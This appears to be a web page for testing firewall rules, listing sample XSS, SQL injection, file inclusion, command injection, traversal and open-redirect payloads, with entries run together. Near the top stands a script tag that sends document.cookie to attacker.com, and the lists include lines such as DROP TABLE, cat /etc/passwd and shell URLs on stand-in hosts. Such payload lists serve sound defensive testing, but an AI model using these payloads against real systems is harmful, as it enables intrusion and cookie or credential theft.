Use this page to test WAF rules by submitting different inputs.
<script>document.location='http://attacker.com/cookie?c='+document.cookie</script>
Try submitting the following inputs to test different WAF rules:
Cross-Site Scripting (XSS Test)
<script>alert('XSS')</script>"><script>alert('XSS')</script><img src="x" onerror="alert('XSS')"><iframe src="javascript:alert('XSS')"></iframe><svg onload="alert('XSS')"></svg>SQL Injection (SQL Injection Test)
SELECT * FROM users WHERE '1'='1'' OR '1'='1' --" OR "1"="1" /*UNION SELECT null, null, null --1'; DROP TABLE users; --SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'DROP TABLE users;Local File Inclusion
../../../../etc/passwd/etc/passwd../../windows/system32/drivers/etc/hosts../../../../var/log/apache2/access.log../../../boot.iniRemote File Inclusion (RFI)
http://www.tpimenta.xyz/malicious.phphttps://attacker.com/shell.txthttps://evil.com/command.phpdata:text/plain;base64,PHNjcmlwdD5hbGVydCgnbWFsaWNpb3VzJyk8L3NjcmlwdD4=file:///etc/passwdCommand Injection
; ls -la&& cat /etc/passwd| whoami$(reboot)ping -c 10 127.0.0.1Directory Traversal
../../etc/passwd (Path Traversal Test)./../../etc/passwd../../../../../../../../../../etc/shadow/../../../../../../../../windows/system32/drivers/etc/hostsC:\windows\system32\cmd.exe/var/www/html/../../etc/passwdOpen Redirect
/redirect?url=http://malicious.com/login?next=http://attacker.com/profile?url=//evil.com//example.com/%0Ahttp://evil.comhttp://127.0.0.1:[email protected]